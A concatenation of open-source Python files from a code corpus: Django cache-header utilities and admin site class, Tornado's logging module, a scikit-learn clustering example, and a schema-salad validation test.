* All keyword parameter names are turned to lowercase, and underscores
are converted to hyphens.
* If the value of a parameter is True (exactly True, not just a
true value), only the parameter name is added to the header.
* All other parameters are added with their value, after applying
str() to it.
"""
def dictitem(s):
t = s.split('=', 1)
if len(t) > 1:
return (t[0].lower(), t[1])
else:
return (t[0].lower(), True)
def dictvalue(t):
if t[1] is True:
return t[0]
else:
return '%s=%s' % (t[0], t[1])
if response.has_header('Cache-Control'):
cc = cc_delim_re.split(response['Cache-Control'])
cc = dict(dictitem(el) for el in cc)
else:
cc = {}
# If there's already a max-age header but we're being asked to set a new
# max-age, use the minimum of the two ages. In practice this happens when
# a decorator and a piece of middleware both operate on a given view.
if 'max-age' in cc and 'max_age' in kwargs:
kwargs['max_age'] = min(int(cc['max-age']), kwargs['max_age'])
# Allow overriding private caching and vice versa
if 'private' in cc and 'public' in kwargs:
del cc['private']
elif 'public' in cc and 'private' in kwargs:
del cc['public']
for (k, v) in kwargs.items():
cc[k.replace('_', '-')] = v
cc = ', '.join(dictvalue(el) for el in cc.items())
response['Cache-Control'] = cc
def get_max_age(response):
"""
Returns the max-age from the response Cache-Control header as an integer
(or ``None`` if it wasn't found or wasn't an integer.
"""
if not response.has_header('Cache-Control'):
return
cc = dict(_to_tuple(el) for el in
cc_delim_re.split(response['Cache-Control']))
if 'max-age' in cc:
try:
return int(cc['max-age'])
except (ValueError, TypeError):
pass
def _set_response_etag(response):
if not response.streaming:
response['ETag'] = '"%s"' % hashlib.md5(response.content).hexdigest()
return response
def patch_response_headers(response, cache_timeout=None):
"""
Adds some useful headers to the given HttpResponse object:
ETag, Last-Modified, Expires and Cache-Control
Each header is only added if it isn't already set.
cache_timeout is in seconds. The CACHE_MIDDLEWARE_SECONDS setting is used
by default.
"""
if cache_timeout is None:
cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
if cache_timeout < 0:
cache_timeout = 0 # Can't have max-age negative
if settings.USE_ETAGS and not response.has_header('ETag'):
if hasattr(response, 'render') and callable(response.render):
response.add_post_render_callback(_set_response_etag)
else:
response = _set_response_etag(response)
if not response.has_header('Last-Modified'):
response['Last-Modified'] = http_date()
if not response.has_header('Expires'):
response['Expires'] = http_date(time.time() + cache_timeout)
patch_cache_control(response, max_age=cache_timeout)
def add_never_cache_headers(response):
"""
Adds headers to a response to indicate that a page should never be cached.
"""
patch_response_headers(response, cache_timeout=-1)
patch_cache_control(response, no_cache=True, no_store=True, must_revalidate=True)
def patch_vary_headers(response, newheaders):
"""
Adds (or updates) the "Vary" header in the given HttpResponse object.
newheaders is a list of header names that should be in "Vary". Existing
headers in "Vary" aren't removed.
"""
# Note that we need to keep the original order intact, because cache
# implementations may rely on the order of the Vary contents in, say,
# computing an MD5 hash.
if response.has_header('Vary'):
vary_headers = cc_delim_re.split(response['Vary'])
else:
vary_headers = []
# Use .lower() here so we treat headers as case-insensitive.
existing_headers = set(header.lower() for header in vary_headers)
additional_headers = [newheader for newheader in newheaders
if newheader.lower() not in existing_headers]
response['Vary'] = ', '.join(vary_headers + additional_headers)
def has_vary_header(response, header_query):
"""
Checks to see if the response has a given header name in its Vary header.
"""
if not response.has_header('Vary'):
return False
vary_headers = cc_delim_re.split(response['Vary'])
existing_headers = set(header.lower() for header in vary_headers)
return header_query.lower() in existing_headers
def _i18n_cache_key_suffix(request, cache_key):
"""If necessary, adds the current locale or time zone to the cache key."""
if settings.USE_I18N or settings.USE_L10N:
# first check if LocaleMiddleware or another middleware added
# LANGUAGE_CODE to request, then fall back to the active language
# which in turn can also fall back to settings.LANGUAGE_CODE
cache_key += '.%s' % getattr(request, 'LANGUAGE_CODE', get_language())
if settings.USE_TZ:
# The datetime module doesn't restrict the output of tzname().
# Windows is known to use non-standard, locale-dependent names.
# User-defined tzinfo classes may return absolutely anything.
# Hence this paranoid conversion to create a valid cache key.
tz_name = force_text(get_current_timezone_name(), errors='ignore')
cache_key += '.%s' % tz_name.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
return cache_key
def _generate_cache_key(request, method, headerlist, key_prefix):
"""Returns a cache key from the headers given in the header list."""
ctx = hashlib.md5()
for header in headerlist:
value = request.META.get(header, None)
if value is not None:
ctx.update(force_bytes(value))
url = hashlib.md5(force_bytes(iri_to_uri(request.build_absolute_uri())))
cache_key = 'views.decorators.cache.cache_page.%s.%s.%s.%s' % (
key_prefix, method, url.hexdigest(), ctx.hexdigest())
return _i18n_cache_key_suffix(request, cache_key)
def _generate_cache_header_key(key_prefix, request):
"""Returns a cache key for the header cache."""
url = hashlib.md5(force_bytes(iri_to_uri(request.build_absolute_uri())))
cache_key = 'views.decorators.cache.cache_header.%s.%s' % (
key_prefix, url.hexdigest())
return _i18n_cache_key_suffix(request, cache_key)
def get_cache_key(request, key_prefix=None, method='GET', cache=None):
"""
Returns a cache key based on the request URL and query. It can be used
in the request phase because it pulls the list of headers to take into
account from the global URL registry and uses those to build a cache key
to check against.
If there is no headerlist stored, the page needs to be rebuilt, so this
function returns None.
"""
if key_prefix is None:
key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
cache_key = _generate_cache_header_key(key_prefix, request)
if cache is None:
cache = caches[settings.CACHE_MIDDLEWARE_ALIAS]
headerlist = cache.get(cache_key, None)
if headerlist is not None:
return _generate_cache_key(request, method, headerlist, key_prefix)
else:
return None
def learn_cache_key(request, response, cache_timeout=None, key_prefix=None, cache=None):
"""
Learns what headers to take into account for some request URL from the
response object. It stores those headers in a global URL registry so that
later access to that URL will know what headers to take into account
without building the response object itself. The headers are named in the
Vary header of the response, but we want to prevent response generation.
The list of headers to use for cache key generation is stored in the same
cache as the pages themselves. If the cache ages some data out of the
cache, this just means that we have to build the response once to get at
the Vary header and so at the list of headers to use for the cache key.
"""
if key_prefix is None:
key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
if cache_timeout is None:
cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
cache_key = _generate_cache_header_key(key_prefix, request)
if cache is None:
cache = caches[settings.CACHE_MIDDLEWARE_ALIAS]
if response.has_header('Vary'):
is_accept_language_redundant = settings.USE_I18N or settings.USE_L10N
# If i18n or l10n are used, the generated cache key will be suffixed
# with the current locale. Adding the raw value of Accept-Language is
# redundant in that case and would result in storing the same content
# under multiple keys in the cache. See #18191 for details.
headerlist = []
for header in cc_delim_re.split(response['Vary']):
header = header.upper().replace('-', '_')
if header == 'ACCEPT_LANGUAGE' and is_accept_language_redundant:
continue
headerlist.append('HTTP_' + header)
headerlist.sort()
cache.set(cache_key, headerlist, cache_timeout)
return _generate_cache_key(request, request.method, headerlist, key_prefix)
else:
# if there is no Vary header, we still need a cache key
# for the request.build_absolute_uri()
cache.set(cache_key, [], cache_timeout)
return _generate_cache_key(request, request.method, [], key_prefix)
def _to_tuple(s):
t = s.split('=', 1)
if len(t) == 2:
return t[0].lower(), t[1]
return t[0].lower(), True
| bsd-3-clause |
Snamint/tornado | tornado/log.py | 45 | 10920 | #!/usr/bin/env python
#
# Copyright 2012 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Logging support for Tornado.
Tornado uses three logger streams:
* ``tornado.access``: Per-request logging for Tornado's HTTP servers (and
potentially other servers in the future)
* ``tornado.application``: Logging of errors from application code (i.e.
uncaught exceptions from callbacks)
* ``tornado.general``: General-purpose logging, including any errors
or warnings from Tornado itself.
These streams may be configured independently using the standard library's
`logging` module. For example, you may wish to send ``tornado.access`` logs
to a separate file for analysis.
"""
from __future__ import absolute_import, division, print_function, with_statement
import logging
import logging.handlers
import sys
from tornado.escape import _unicode
from tornado.util import unicode_type, basestring_type
try:
import curses
except ImportError:
curses = None
# Logger objects for internal tornado use
access_log = logging.getLogger("tornado.access")
app_log = logging.getLogger("tornado.application")
gen_log = logging.getLogger("tornado.general")
def _stderr_supports_color():
color = False
if curses and hasattr(sys.stderr, 'isatty') and sys.stderr.isatty():
try:
curses.setupterm()
if curses.tigetnum("colors") > 0:
color = True
except Exception:
pass
return color
def _safe_unicode(s):
try:
return _unicode(s)
except UnicodeDecodeError:
return repr(s)
class LogFormatter(logging.Formatter):
"""Log formatter used in Tornado.
Key features of this formatter are:
* Color support when logging to a terminal that supports it.
* Timestamps on every log line.
* Robust against str/bytes encoding problems.
This formatter is enabled automatically by
`tornado.options.parse_command_line` (unless ``--logging=none`` is
used).
"""
DEFAULT_FORMAT = '%(color)s[%(levelname)1.1s %(asctime)s %(module)s:%(lineno)d]%(end_color)s %(message)s'
DEFAULT_DATE_FORMAT = '%y%m%d %H:%M:%S'
DEFAULT_COLORS = {
logging.DEBUG: 4, # Blue
logging.INFO: 2, # Green
logging.WARNING: 3, # Yellow
logging.ERROR: 1, # Red
}
def __init__(self, color=True, fmt=DEFAULT_FORMAT,
datefmt=DEFAULT_DATE_FORMAT, colors=DEFAULT_COLORS):
r"""
:arg bool color: Enables color support.
:arg string fmt: Log message format.
It will be applied to the attributes dict of log records. The
text between ``%(color)s`` and ``%(end_color)s`` will be colored
depending on the level if color support is on.
:arg dict colors: color mappings from logging level to terminal color
code
:arg string datefmt: Datetime format.
Used for formatting ``(asctime)`` placeholder in ``prefix_fmt``.
.. versionchanged:: 3.2
Added ``fmt`` and ``datefmt`` arguments.
"""
logging.Formatter.__init__(self, datefmt=datefmt)
self._fmt = fmt
self._colors = {}
if color and _stderr_supports_color():
# The curses module has some str/bytes confusion in
# python3. Until version 3.2.3, most methods return
# bytes, but only accept strings. In addition, we want to
# output these strings with the logging module, which
# works with unicode strings. The explicit calls to
# unicode() below are harmless in python2 but will do the
# right conversion in python 3.
fg_color = (curses.tigetstr("setaf") or
curses.tigetstr("setf") or "")
if (3, 0) < sys.version_info < (3, 2, 3):
fg_color = unicode_type(fg_color, "ascii")
for levelno, code in colors.items():
self._colors[levelno] = unicode_type(curses.tparm(fg_color, code), "ascii")
self._normal = unicode_type(curses.tigetstr("sgr0"), "ascii")
else:
self._normal = ''
def format(self, record):
try:
message = record.getMessage()
assert isinstance(message, basestring_type) # guaranteed by logging
# Encoding notes: The logging module prefers to work with character
# strings, but only enforces that log messages are instances of
# basestring. In python 2, non-ascii bytestrings will make
# their way through the logging framework until they blow up with
# an unhelpful decoding error (with this formatter it happens
# when we attach the prefix, but there are other opportunities for
# exceptions further along in the framework).
#
# If a byte string makes it this far, convert it to unicode to
# ensure it will make it out to the logs. Use repr() as a fallback
# to ensure that all byte strings can be converted successfully,
# but don't do it by default so we don't add extra quotes to ascii
# bytestrings. This is a bit of a hacky place to do this, but
# it's worth it since the encoding errors that would otherwise
# result are so useless (and tornado is fond of using utf8-encoded
# byte strings whereever possible).
record.message = _safe_unicode(message)
except Exception as e:
record.message = "Bad message (%r): %r" % (e, record.__dict__)
record.asctime = self.formatTime(record, self.datefmt)
if record.levelno in self._colors:
record.color = self._colors[record.levelno]
record.end_color = self._normal
else:
record.color = record.end_color = ''
formatted = self._fmt % record.__dict__
if record.exc_info:
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
# exc_text contains multiple lines. We need to _safe_unicode
# each line separately so that non-utf8 bytes don't cause
# all the newlines to turn into '\n'.
lines = [formatted.rstrip()]
lines.extend(_safe_unicode(ln) for ln in record.exc_text.split('\n'))
formatted = '\n'.join(lines)
return formatted.replace("\n", "\n ")
def enable_pretty_logging(options=None, logger=None):
"""Turns on formatted logging output as configured.
This is called automatically by `tornado.options.parse_command_line`
and `tornado.options.parse_config_file`.
"""
if options is None:
from tornado.options import options
if options.logging is None or options.logging.lower() == 'none':
return
if logger is None:
logger = logging.getLogger()
logger.setLevel(getattr(logging, options.logging.upper()))
if options.log_file_prefix:
rotate_mode = options.log_rotate_mode
if rotate_mode == 'size':
channel = logging.handlers.RotatingFileHandler(
filename=options.log_file_prefix,
maxBytes=options.log_file_max_size,
backupCount=options.log_file_num_backups)
elif rotate_mode == 'time':
channel = logging.handlers.TimedRotatingFileHandler(
filename=options.log_file_prefix,
when=options.log_rotate_when,
interval=options.log_rotate_interval,
backupCount=options.log_file_num_backups)
else:
error_message = 'The value of log_rotate_mode option should be ' +\
'"size" or "time", not "%s".' % rotate_mode
raise ValueError(error_message)
channel.setFormatter(LogFormatter(color=False))
logger.addHandler(channel)
if (options.log_to_stderr or
(options.log_to_stderr is None and not logger.handlers)):
# Set up color if we are in a tty and curses is installed
channel = logging.StreamHandler()
channel.setFormatter(LogFormatter())
logger.addHandler(channel)
def define_logging_options(options=None):
"""Add logging-related flags to ``options``.
These options are present automatically on the default options instance;
this method is only necessary if you have created your own `.OptionParser`.
.. versionadded:: 4.2
This function existed in prior versions but was broken and undocumented until 4.2.
"""
if options is None:
# late import to prevent cycle
from tornado.options import options
options.define("logging", default="info",
help=("Set the Python log level. If 'none', tornado won't touch the "
"logging configuration."),
metavar="debug|info|warning|error|none")
options.define("log_to_stderr", type=bool, default=None,
help=("Send log output to stderr (colorized if possible). "
"By default use stderr if --log_file_prefix is not set and "
"no other logging is configured."))
options.define("log_file_prefix", type=str, default=None, metavar="PATH",
help=("Path prefix for log files. "
"Note that if you are running multiple tornado processes, "
"log_file_prefix must be different for each of them (e.g. "
"include the port number)"))
options.define("log_file_max_size", type=int, default=100 * 1000 * 1000,
help="max size of log files before rollover")
options.define("log_file_num_backups", type=int, default=10,
help="number of log files to keep")
options.define("log_rotate_when", type=str, default='midnight',
help=("specify the type of TimedRotatingFileHandler interval "
"other options:('S', 'M', 'H', 'D', 'W0'-'W6')"))
options.define("log_rotate_interval", type=int, default=1,
help="The interval value of timed rotating")
options.define("log_rotate_mode", type=str, default='size',
help="The mode of rotating files(time or size)")
options.add_parse_callback(lambda: enable_pretty_logging(options))
| apache-2.0 |
xavierwu/scikit-learn | examples/cluster/plot_agglomerative_clustering.py | 343 | 2931 | """
Agglomerative clustering with and without structure
===================================================
This example shows the effect of imposing a connectivity graph to capture
local structure in the data. The graph is simply the graph of 20 nearest
neighbors.
Two consequences of imposing a connectivity can be seen. First clustering
with a connectivity matrix is much faster.
Second, when using a connectivity matrix, average and complete linkage are
unstable and tend to create a few clusters that grow very quickly. Indeed,
average and complete linkage fight this percolation behavior by considering all
the distances between two clusters when merging them. The connectivity
graph breaks this mechanism. This effect is more pronounced for very
sparse graphs (try decreasing the number of neighbors in
kneighbors_graph) and with complete linkage. In particular, having a very
small number of neighbors in the graph, imposes a geometry that is
close to that of single linkage, which is well known to have this
percolation instability.
"""
# Authors: Gael Varoquaux, Nelle Varoquaux
# License: BSD 3 clause
import time
import matplotlib.pyplot as plt
import numpy as np
from sklearn.cluster import AgglomerativeClustering
from sklearn.neighbors import kneighbors_graph
# Generate sample data
n_samples = 1500
np.random.seed(0)
t = 1.5 * np.pi * (1 + 3 * np.random.rand(1, n_samples))
x = t * np.cos(t)
y = t * np.sin(t)
X = np.concatenate((x, y))
X += .7 * np.random.randn(2, n_samples)
X = X.T
# Create a graph capturing local connectivity. Larger number of neighbors
# will give more homogeneous clusters to the cost of computation
# time. A very large number of neighbors gives more evenly distributed
# cluster sizes, but may not impose the local manifold structure of
# the data
knn_graph = kneighbors_graph(X, 30, include_self=False)
for connectivity in (None, knn_graph):
for n_clusters in (30, 3):
plt.figure(figsize=(10, 4))
for index, linkage in enumerate(('average', 'complete', 'ward')):
plt.subplot(1, 3, index + 1)
model = AgglomerativeClustering(linkage=linkage,
connectivity=connectivity,
n_clusters=n_clusters)
t0 = time.time()
model.fit(X)
elapsed_time = time.time() - t0
plt.scatter(X[:, 0], X[:, 1], c=model.labels_,
cmap=plt.cm.spectral)
plt.title('linkage=%s (time %.2fs)' % (linkage, elapsed_time),
fontdict=dict(verticalalignment='top'))
plt.axis('equal')
plt.axis('off')
plt.subplots_adjust(bottom=0, top=.89, wspace=0,
left=0, right=1)
plt.suptitle('n_cluster=%i, connectivity=%r' %
(n_clusters, connectivity is not None), size=17)
plt.show()
| bsd-3-clause |
mr-c/common-workflow-language | v1.0/salad/schema_salad/tests/test_errors.py | 7 | 1436 | from __future__ import absolute_import
from __future__ import print_function
from .util import get_data
import unittest
from schema_salad.schema import load_schema, load_and_validate
from schema_salad.validate import ValidationException
from avro.schema import Names
import six
class TestErrors(unittest.TestCase):
def test_errors(self):
document_loader, avsc_names, schema_metadata, metaschema_loader = load_schema(
get_data(u"tests/test_schema/CommonWorkflowLanguage.yml"))
for t in ("test_schema/test1.cwl",
"test_schema/test2.cwl",
"test_schema/test3.cwl",
"test_schema/test4.cwl",
"test_schema/test5.cwl",
"test_schema/test6.cwl",
"test_schema/test7.cwl",
"test_schema/test8.cwl",
"test_schema/test9.cwl",
"test_schema/test10.cwl",
"test_schema/test11.cwl",
"test_schema/test12.cwl",
"test_schema/test13.cwl",
"test_schema/test14.cwl"):
with self.assertRaises(ValidationException):
try:
load_and_validate(document_loader, avsc_names,
six.text_type(get_data("tests/"+t)), True)
except ValidationException as e:
print("\n", e)
raise
| apache-2.0 |
bikong2/django | django/contrib/admin/sites.py | 120 | 21146 | from functools import update_wrapper
from django.apps import apps
from django.conf import settings
from django.contrib.admin import ModelAdmin, actions
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.core.exceptions import ImproperlyConfigured, PermissionDenied
from django.core.urlresolvers import NoReverseMatch, reverse
from django.db.models.base import ModelBase
from django.http import Http404, HttpResponseRedirect
from django.template.engine import Engine
from django.template.response import TemplateResponse
from django.utils import six
from django.utils.text import capfirst
from django.utils.translation import ugettext as _, ugettext_lazy
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
system_check_errors = []
class AlreadyRegistered(Exception):
pass
class NotRegistered(Exception):
pass
class AdminSite(object):
"""
An AdminSite object encapsulates an instance of the Django admin application, ready
to be hooked in to your URLconf. Models are registered with the AdminSite using the
register() method, and the get_urls() method can then be used to access Django view
functions that present a full admin interface for the collection of registered
models.
"""
# Text to put at the end of each page's <title>.
site_title = ugettext_lazy('Django site admin')
# Text to put in each page's <h1>.
site_header = ugettext_lazy('Django administration')
# Text to put at the top of the admin index page.
index_title = ugettext_lazy('Site administration')
# URL for the "View site" link at the top of each admin page.
site_url = '/'
_empty_value_display = '-'
login_form = None
index_template = None
app_index_template = None
login_template = None
logout_template = None
password_change_template = None
password_change_done_template = None
def __init__(self, name='admin'):
self._registry = {} # model_class class -> admin_class instance
self.name = name
self._actions = {'delete_selected': actions.delete_selected}
self._global_actions = self._actions.copy()
def register(self, model_or_iterable, admin_class=None, **options):
"""
Registers the given model(s) with the given admin class.
The model(s) should be Model classes, not instances.
If an admin class isn't given, it will use ModelAdmin (the default
admin options). If keyword arguments are given -- e.g., list_display --
they'll be applied as options to the admin class.
If a model is already registered, this will raise AlreadyRegistered.
If a model is abstract, this will raise ImproperlyConfigured.
"""
if not admin_class:
admin_class = ModelAdmin
if isinstance(model_or_iterable, ModelBase):
model_or_iterable = [model_or_iterable]
for model in model_or_iterable:
if model._meta.abstract:
raise ImproperlyConfigured('The model %s is abstract, so it '
'cannot be registered with admin.' % model.__name__)
if model in self._registry:
raise AlreadyRegistered('The model %s is already registered' % model.__name__)
# Ignore the registration if the model has been
# swapped out.
if not model._meta.swapped:
# If we got **options then dynamically construct a subclass of
# admin_class with those **options.
if options:
# For reasons I don't quite understand, without a __module__
# the created class appears to "live" in the wrong place,
# which causes issues later on.
options['__module__'] = __name__
admin_class = type("%sAdmin" % model.__name__, (admin_class,), options)
# Instantiate the admin class to save in the registry
admin_obj = admin_class(model, self)
if admin_class is not ModelAdmin and settings.DEBUG:
system_check_errors.extend(admin_obj.check())
self._registry[model] = admin_obj
def unregister(self, model_or_iterable):
"""
Unregisters the given model(s).
If a model isn't already registered, this will raise NotRegistered.
"""
if isinstance(model_or_iterable, ModelBase):
model_or_iterable = [model_or_iterable]
for model in model_or_iterable:
if model not in self._registry:
raise NotRegistered('The model %s is not registered' % model.__name__)
del self._registry[model]
def is_registered(self, model):
"""
Check if a model class is registered with this `AdminSite`.
"""
return model in self._registry
def add_action(self, action, name=None):
"""
Register an action to be available globally.
"""
name = name or action.__name__
self._actions[name] = action
self._global_actions[name] = action
def disable_action(self, name):
"""
Disable a globally-registered action. Raises KeyError for invalid names.
"""
del self._actions[name]
def get_action(self, name):
"""
Explicitly get a registered global action whether it's enabled or
not. Raises KeyError for invalid names.
"""
return self._global_actions[name]
@property
def actions(self):
"""
Get all the enabled actions as an iterable of (name, func).
"""
return six.iteritems(self._actions)
@property
def empty_value_display(self):
return self._empty_value_display
@empty_value_display.setter
def empty_value_display(self, empty_value_display):
self._empty_value_display = empty_value_display
def has_permission(self, request):
"""
Returns True if the given HttpRequest has permission to view
*at least one* page in the admin site.
"""
return request.user.is_active and request.user.is_staff
def check_dependencies(self):
"""
Check that all things needed to run the admin have been correctly installed.
The default implementation checks that admin and contenttypes apps are
installed, as well as the auth context processor.
"""
if not apps.is_installed('django.contrib.admin'):
raise ImproperlyConfigured(
"Put 'django.contrib.admin' in your INSTALLED_APPS "
"setting in order to use the admin application.")
if not apps.is_installed('django.contrib.contenttypes'):
raise ImproperlyConfigured(
"Put 'django.contrib.contenttypes' in your INSTALLED_APPS "
"setting in order to use the admin application.")
try:
default_template_engine = Engine.get_default()
except Exception:
# Skip this non-critical check:
# 1. if the user has a non-trivial TEMPLATES setting and Django
# can't find a default template engine
# 2. if anything goes wrong while loading template engines, in
# order to avoid raising an exception from a confusing location
# Catching ImproperlyConfigured suffices for 1. but 2. requires
# catching all exceptions.
pass
else:
if ('django.contrib.auth.context_processors.auth'
not in default_template_engine.context_processors):
raise ImproperlyConfigured(
"Enable 'django.contrib.auth.context_processors.auth' "
"in your TEMPLATES setting in order to use the admin "
"application.")
def admin_view(self, view, cacheable=False):
"""
Decorator to create an admin view attached to this ``AdminSite``. This
wraps the view and provides permission checking by calling
``self.has_permission``.
You'll want to use this from within ``AdminSite.get_urls()``:
class MyAdminSite(AdminSite):
def get_urls(self):
from django.conf.urls import url
urls = super(MyAdminSite, self).get_urls()
urls += [
url(r'^my_view/$', self.admin_view(some_view))
]
return urls
By default, admin_views are marked non-cacheable using the
``never_cache`` decorator. If the view can be safely cached, set
cacheable=True.
"""
def inner(request, *args, **kwargs):
if not self.has_permission(request):
if request.path == reverse('admin:logout', current_app=self.name):
index_path = reverse('admin:index', current_app=self.name)
return HttpResponseRedirect(index_path)
# Inner import to prevent django.contrib.admin (app) from
# importing django.contrib.auth.models.User (unrelated model).
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(
request.get_full_path(),
reverse('admin:login', current_app=self.name)
)
return view(request, *args, **kwargs)
if not cacheable:
inner = never_cache(inner)
# We add csrf_protect here so this function can be used as a utility
# function for any view, without having to repeat 'csrf_protect'.
if not getattr(view, 'csrf_exempt', False):
inner = csrf_protect(inner)
return update_wrapper(inner, view)
def get_urls(self):
from django.conf.urls import url, include
# Since this module gets imported in the application's root package,
# it cannot import models from other applications at the module level,
# and django.contrib.contenttypes.views imports ContentType.
from django.contrib.contenttypes import views as contenttype_views
if settings.DEBUG:
self.check_dependencies()
def wrap(view, cacheable=False):
def wrapper(*args, **kwargs):
return self.admin_view(view, cacheable)(*args, **kwargs)
wrapper.admin_site = self
return update_wrapper(wrapper, view)
# Admin-site-wide views.
urlpatterns = [
url(r'^$', wrap(self.index), name='index'),
url(r'^login/$', self.login, name='login'),
url(r'^logout/$', wrap(self.logout), name='logout'),
url(r'^password_change/$', wrap(self.password_change, cacheable=True), name='password_change'),
url(r'^password_change/done/$', wrap(self.password_change_done, cacheable=True),
name='password_change_done'),
url(r'^jsi18n/$', wrap(self.i18n_javascript, cacheable=True), name='jsi18n'),
url(r'^r/(?P<content_type_id>\d+)/(?P<object_id>.+)/$', wrap(contenttype_views.shortcut),
name='view_on_site'),
]
# Add in each model's views, and create a list of valid URLS for the
# app_index
valid_app_labels = []
for model, model_admin in self._registry.items():
urlpatterns += [
url(r'^%s/%s/' % (model._meta.app_label, model._meta.model_name), include(model_admin.urls)),
]
if model._meta.app_label not in valid_app_labels:
valid_app_labels.append(model._meta.app_label)
# If there were ModelAdmins registered, we should have a list of app
# labels for which we need to allow access to the app_index view,
if valid_app_labels:
regex = r'^(?P<app_label>' + '|'.join(valid_app_labels) + ')/$'
urlpatterns += [
url(regex, wrap(self.app_index), name='app_list'),
]
return urlpatterns
@property
def urls(self):
return self.get_urls(), 'admin', self.name
def each_context(self, request):
"""
Returns a dictionary of variables to put in the template context for
*every* page in the admin site.
"""
return {
'site_title': self.site_title,
'site_header': self.site_header,
'site_url': self.site_url,
'has_permission': self.has_permission(request),
'available_apps': self.get_app_list(request),
}
def password_change(self, request, extra_context=None):
"""
Handles the "change password" task -- both form display and validation.
"""
from django.contrib.admin.forms import AdminPasswordChangeForm
from django.contrib.auth.views import password_change
url = reverse('admin:password_change_done', current_app=self.name)
defaults = {
'password_change_form': AdminPasswordChangeForm,
'post_change_redirect': url,
'extra_context': dict(self.each_context(request), **(extra_context or {})),
}
if self.password_change_template is not None:
defaults['template_name'] = self.password_change_template
request.current_app = self.name
return password_change(request, **defaults)
def password_change_done(self, request, extra_context=None):
"""
Displays the "success" page after a password change.
"""
from django.contrib.auth.views import password_change_done
defaults = {
'extra_context': dict(self.each_context(request), **(extra_context or {})),
}
if self.password_change_done_template is not None:
defaults['template_name'] = self.password_change_done_template
request.current_app = self.name
return password_change_done(request, **defaults)
def i18n_javascript(self, request):
"""
Displays the i18n JavaScript that the Django admin requires.
This takes into account the USE_I18N setting. If it's set to False, the
generated JavaScript will be leaner and faster.
"""
if settings.USE_I18N:
from django.views.i18n import javascript_catalog
else:
from django.views.i18n import null_javascript_catalog as javascript_catalog
return javascript_catalog(request, packages=['django.conf', 'django.contrib.admin'])
@never_cache
def logout(self, request, extra_context=None):
"""
Logs out the user for the given HttpRequest.
This should *not* assume the user is already logged in.
"""
from django.contrib.auth.views import logout
defaults = {
'extra_context': dict(self.each_context(request), **(extra_context or {})),
}
if self.logout_template is not None:
defaults['template_name'] = self.logout_template
request.current_app = self.name
return logout(request, **defaults)
@never_cache
def login(self, request, extra_context=None):
"""
Displays the login form for the given HttpRequest.
"""
if request.method == 'GET' and self.has_permission(request):
# Already logged-in, redirect to admin index
index_path = reverse('admin:index', current_app=self.name)
return HttpResponseRedirect(index_path)
from django.contrib.auth.views import login
# Since this module gets imported in the application's root package,
# it cannot import models from other applications at the module level,
# and django.contrib.admin.forms eventually imports User.
from django.contrib.admin.forms import AdminAuthenticationForm
context = dict(self.each_context(request),
title=_('Log in'),
app_path=request.get_full_path(),
)
if (REDIRECT_FIELD_NAME not in request.GET and
REDIRECT_FIELD_NAME not in request.POST):
context[REDIRECT_FIELD_NAME] = reverse('admin:index', current_app=self.name)
context.update(extra_context or {})
defaults = {
'extra_context': context,
'authentication_form': self.login_form or AdminAuthenticationForm,
'template_name': self.login_template or 'admin/login.html',
}
request.current_app = self.name
return login(request, **defaults)
def _build_app_dict(self, request, label=None):
"""
Builds the app dictionary. Takes an optional label parameters to filter
models of a specific app.
"""
app_dict = {}
if label:
models = {
m: m_a for m, m_a in self._registry.items()
if m._meta.app_label == label
}
else:
models = self._registry
for model, model_admin in models.items():
app_label = model._meta.app_label
has_module_perms = model_admin.has_module_permission(request)
if not has_module_perms:
if label:
raise PermissionDenied
continue
perms = model_admin.get_model_perms(request)
# Check whether user has any perm for this module.
# If so, add the module to the model_list.
if True not in perms.values():
continue
info = (app_label, model._meta.model_name)
model_dict = {
'name': capfirst(model._meta.verbose_name_plural),
'object_name': model._meta.object_name,
'perms': perms,
}
if perms.get('change'):
try:
model_dict['admin_url'] = reverse('admin:%s_%s_changelist' % info, current_app=self.name)
except NoReverseMatch:
pass
if perms.get('add'):
try:
model_dict['add_url'] = reverse('admin:%s_%s_add' % info, current_app=self.name)
except NoReverseMatch:
pass
if app_label in app_dict:
app_dict[app_label]['models'].append(model_dict)
else:
app_dict[app_label] = {
'name': apps.get_app_config(app_label).verbose_name,
'app_label': app_label,
'app_url': reverse(
'admin:app_list',
kwargs={'app_label': app_label},
current_app=self.name,
),
'has_module_perms': has_module_perms,
'models': [model_dict],
}
if label:
return app_dict.get(label)
return app_dict
def get_app_list(self, request):
"""
Returns a sorted list of all the installed apps that have been
registered in this site.
"""
app_dict = self._build_app_dict(request)
# Sort the apps alphabetically.
app_list = sorted(app_dict.values(), key=lambda x: x['name'].lower())
# Sort the models alphabetically within each app.
for app in app_list:
app['models'].sort(key=lambda x: x['name'])
return app_list
@never_cache
def index(self, request, extra_context=None):
"""
Displays the main admin index page, which lists all of the installed
apps that have been registered in this site.
"""
app_list = self.get_app_list(request)
context = dict(
self.each_context(request),
title=self.index_title,
app_list=app_list,
)
context.update(extra_context or {})
request.current_app = self.name
return TemplateResponse(request, self.index_template or
'admin/index.html', context)
def app_index(self, request, app_label, extra_context=None):
app_dict = self._build_app_dict(request, app_label)
if not app_dict:
raise Http404('The requested admin page does not exist.')
# Sort the models alphabetically within each app.
app_dict['models'].sort(key=lambda x: x['name'])
app_name = apps.get_app_config(app_label).verbose_name
context = dict(self.each_context(request),
title=_('%(app)s administration') % {'app': app_name},
app_list=[app_dict],
app_label=app_label,
)
context.update(extra_context or {})
request.current_app = self.name
return TemplateResponse(request, self.app_index_template or [
'admin/%s/app_index.html' % app_label,
'admin/app_index.html'
], context)
# This global object represents the default admin site, for the common case.
# You can instantiate AdminSite in your own code to create a custom admin site.
site = AdminSite()
| bsd-3-clause |
